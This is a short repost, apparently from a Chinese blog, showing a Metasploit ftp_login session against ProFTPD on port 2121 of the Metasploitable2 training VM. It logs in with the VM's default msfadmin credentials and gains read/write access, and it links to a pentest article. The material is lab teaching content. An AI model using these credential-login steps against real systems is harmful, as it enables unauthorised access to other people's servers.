Metasploitable2 - tcp port 2121 - Proftp

来源:互联网 发布:javascript运算符 编辑:程序博客网 时间:2024/06/06 15:34

msf > use auxiliary/scanner/ftp/ftp_loginmsf auxiliary(ftp_login) > set USERNAME msfadminUSERNAME => msfadminmsf auxiliary(ftp_login) > set PASSWORD msfadminPASSWORD => msfadminmsf auxiliary(ftp_login) > set RPORT 2121RPORT => 2121msf auxiliary(ftp_login) > set RHOSTS 192.168.1.111RHOSTS => 192.168.1.111msf auxiliary(ftp_login) > run[*] 192.168.1.111:2121 - Starting FTP login sweep[*] Connecting to FTP server 192.168.1.111:2121...[*] Connected to target FTP server.[*] 192.168.1.111:2121 - FTP Banner: '220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.1.111]\x0d\x0a'[*] 192.168.1.111:2121 FTP - Attempting FTP login for 'anonymous':'User@'[*] 192.168.1.111:2121 FTP - Failed FTP login for 'anonymous':'User@'[*] 192.168.1.111:2121 FTP - [1/1] - Attempting FTP login for 'msfadmin':'msfadmin'[+] 192.168.1.111:2121 - Successful FTP login for 'msfadmin':'msfadmin'[*] 192.168.1.111:2121 - User 'msfadmin' has READ/WRITE access[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

推荐:

http://pentestlab.wordpress.com/2012/03/01/attacking-the-ftp-service/

0 0
原创粉丝点击